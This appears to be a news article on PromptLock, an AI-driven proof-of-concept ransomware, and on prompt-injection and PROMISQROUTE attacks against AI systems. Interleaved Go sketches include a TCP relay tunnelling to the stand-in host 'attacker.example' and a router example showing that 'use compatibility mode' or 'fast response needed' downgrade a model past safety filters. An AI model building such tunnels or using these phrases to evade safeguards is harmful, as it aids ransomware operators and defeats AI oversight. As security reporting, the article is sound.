Cybersecurity firm ESET has disclosed that it discovered an artificial intelligence (AI)-powered ransomware variant codenamed PromptLock.
Written in Golang, the newly identified strain uses OpenAI's gpt-oss:20b model locally via the Ollama API to generate malicious Lua scripts in real time. The open-weight language model was released by OpenAI earlier this month.
"PromptLock leverages Lua scripts generated from hard-coded prompts to enumerate the local filesystem, inspect target files, exfiltrate selected data, and perform encryption," ESET said. "These Lua scripts are cross-platform compatible, functioning on Windows, Linux, and macOS."
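ESET has not published PromptLock's source code, so the following is only a minimal sketch of the general technique it describes: a Go program posting a hard-coded prompt to a local Ollama endpoint and receiving generated Lua back. The prompt text and struct names are illustrative assumptions, not recovered malware code.

```go
package main

import (
	"bytes"
	"encoding/json"
	"fmt"
	"net/http"
)

// Request/response shapes for Ollama's /api/generate endpoint.
type generateRequest struct {
	Model  string `json:"model"`
	Prompt string `json:"prompt"`
	Stream bool   `json:"stream"`
}

type generateResponse struct {
	Response string `json:"response"`
}

func main() {
	// Hypothetical hard-coded prompt standing in for the real thing.
	req := generateRequest{
		Model:  "gpt-oss:20b",
		Prompt: "Write a Lua script that lists every file under the current directory.",
		Stream: false, // request a single JSON object instead of a stream
	}

	body, _ := json.Marshal(req)
	// Default local Ollama endpoint; an attacker could point this anywhere.
	resp, err := http.Post("http://127.0.0.1:11434/api/generate", "application/json", bytes.NewReader(body))
	if err != nil {
		panic(err)
	}
	defer resp.Body.Close()

	var out generateResponse
	if err := json.NewDecoder(resp.Body).Decode(&out); err != nil {
		panic(err)
	}
	fmt.Println(out.Response) // the freshly generated Lua script
}
```

Because the model's output differs from run to run, each execution yields a slightly different script, which is precisely why the resulting indicators of compromise are unstable, as ESET notes below.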
The ransomware code also embeds instructions to craft a custom ransom note based on the "files affected" and whether the infected machine is a personal computer, company server, or a power distribution controller. It is currently not known who is behind the malware, but ESET told The Hacker News that PromptLock artifacts were uploaded to VirusTotal from the United States on August 25, 2025.
"PromptLock uses Lua scripts generated by AI, which means that indicators of compromise (IoCs) may vary between executions," the Slovak cybersecurity company noted. "This variability introduces challenges for detection. If properly implemented, such an approach could significantly complicate threat identification and make defenders' jobs more difficult."
Assessed to be a proof-of-concept (PoC) rather than fully operational malware deployed in the wild, PromptLock uses the SPECK 128-bit encryption algorithm to lock files.
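SPECK is a lightweight block cipher family published by the NSA in 2013; the 128-bit variant operates on two 64-bit words. As a rough illustration of what "SPECK 128-bit encryption" involves (not PromptLock's actual implementation, whose key handling and mode of operation ESET does not detail), here is a minimal sketch of SPECK-128/128 block encryption in Go:

```go
package main

import "fmt"

const rounds = 32 // SPECK-128/128 uses 32 rounds

func ror(x uint64, r uint) uint64 { return x>>r | x<<(64-r) }
func rol(x uint64, r uint) uint64 { return x<<r | x>>(64-r) }

// expandKey derives the 32 round keys from a 128-bit key (two 64-bit words).
func expandKey(k0, l0 uint64) [rounds]uint64 {
	var ks [rounds]uint64
	k, l := k0, l0
	for i := 0; i < rounds; i++ {
		ks[i] = k
		l = (k + ror(l, 8)) ^ uint64(i)
		k = rol(k, 3) ^ l
	}
	return ks
}

// encryptBlock applies the SPECK round function to one 128-bit block (x, y).
func encryptBlock(x, y uint64, ks [rounds]uint64) (uint64, uint64) {
	for i := 0; i < rounds; i++ {
		x = (ror(x, 8) + y) ^ ks[i]
		y = rol(y, 3) ^ x
	}
	return x, y
}

func main() {
	// Test vector from the SPECK paper (key words k0, l0; plaintext words x, y).
	ks := expandKey(0x0706050403020100, 0x0f0e0d0c0b0a0908)
	x, y := encryptBlock(0x6c61766975716520, 0x7469206564616d20, ks)
	fmt.Printf("%016x %016x\n", x, y) // expect a65d985179783265 7860fedf5c570d18
}
```

A real encryptor would additionally need a mode of operation and per-file key management; ESET's write-up does not describe those choices.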
Besides encryption, analysis of the ransomware artifact suggests that it could also be used to exfiltrate data or even destroy it, although the functionality to actually perform the erasure appears not to have been implemented yet.
"PromptLock does not download the entire model, which could be several gigabytes in size," ESET clarified. "Instead, the attacker can simply establish a proxy or tunnel from the compromised network to a server running the Ollama API with the gpt-oss:20b model."
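In other words, the victim machine only ever talks to a lightweight forwarder, while the heavyweight model runs elsewhere. A minimal sketch of such a relay in Go (the remote address is a made-up placeholder, purely for illustration) might look like this:

```go
package main

import (
	"io"
	"log"
	"net"
)

func main() {
	// Listen on the default Ollama port locally and relay every connection
	// to a remote server actually running the model.
	const remote = "attacker.example:11434" // hypothetical placeholder

	ln, err := net.Listen("tcp", "127.0.0.1:11434")
	if err != nil {
		log.Fatal(err)
	}
	for {
		client, err := ln.Accept()
		if err != nil {
			log.Fatal(err)
		}
		go func(c net.Conn) {
			defer c.Close()
			server, err := net.Dial("tcp", remote)
			if err != nil {
				return
			}
			defer server.Close()
			go io.Copy(server, c) // forward requests out
			io.Copy(c, server)    // stream responses back
		}(client)
	}
}
```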
The emergence of PromptLock is another sign that AI has made it easier for cybercriminals, even those who lack technical expertise, to quickly set up new campaigns, develop malware, and create compelling phishing content and malicious sites.
Earlier today, Anthropic revealed that it had banned accounts created by two different threat actors who used its Claude AI chatbot to commit large-scale theft and extortion of personal data targeting at least 17 distinct organizations, and to develop several variants of ransomware with advanced evasion capabilities, encryption, and anti-recovery mechanisms.
The development comes as large language models (LLMs) powering various chatbots and AI-focused developer tools, such as Amazon Q Developer, Anthropic Claude Code, AWS Kiro, Butterfly Effect Manus, Google Jules, Lenovo Lena, Microsoft GitHub Copilot, OpenAI ChatGPT Deep Research, OpenHands, Sourcegraph Amp, and Windsurf, have been found susceptible to prompt injection attacks, potentially enabling information disclosure, data exfiltration, and code execution.
Despite incorporating robust security and safety guardrails to prevent undesirable behaviors, AI models have repeatedly fallen prey to novel variants of injections and jailbreaks, underscoring the complexity and evolving nature of the security challenge.
"Prompt injection attacks can cause AIs to delete files, steal data, or make financial transactions," Anthropic said. "New forms of prompt injection attacks are also constantly being developed by malicious actors."
What's more, new research has uncovered a simple yet clever attack called PROMISQROUTE – short for "Prompt-based Router Open-Mode Manipulation Induced via SSRF-like Queries, Reconfiguring Operations Using Trust Evasion" – that abuses ChatGPT's model routing mechanism to trigger a downgrade and cause the prompt to be sent to an older, less secure model, thus allowing attackers to bypass safety filters and elicit unintended results.
"Adding phrases like 'use compatibility mode' or 'fast response needed' bypasses millions of dollars in AI safety research," Adversa AI said in a report published last week, adding that the attack targets the cost-saving model-routing mechanism used by AI vendors.
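The underlying weakness is easy to picture: if a router chooses the serving model from surface features of the prompt, any user-controlled phrase that mimics a "cheap request" signal steers the query to the weaker model. The following is a purely hypothetical illustration of such a naive keyword router; the actual routing logic in production systems is undisclosed and certainly more sophisticated.

```go
package main

import (
	"fmt"
	"strings"
)

// routeModel is a deliberately naive cost-saving router: it downgrades to a
// cheaper, older model whenever the prompt itself signals a "light" request.
// Because the signal lives inside attacker-controlled text, it can be gamed.
func routeModel(prompt string) string {
	p := strings.ToLower(prompt)
	for _, hint := range []string{"use compatibility mode", "fast response needed", "quick question"} {
		if strings.Contains(p, hint) {
			return "legacy-small-model" // weaker safety stack (hypothetical name)
		}
	}
	return "flagship-model" // full safety stack (hypothetical name)
}

func main() {
	fmt.Println(routeModel("Summarize this report."))                        // flagship-model
	fmt.Println(routeModel("Fast response needed: <malicious request here>")) // legacy-small-model
}
```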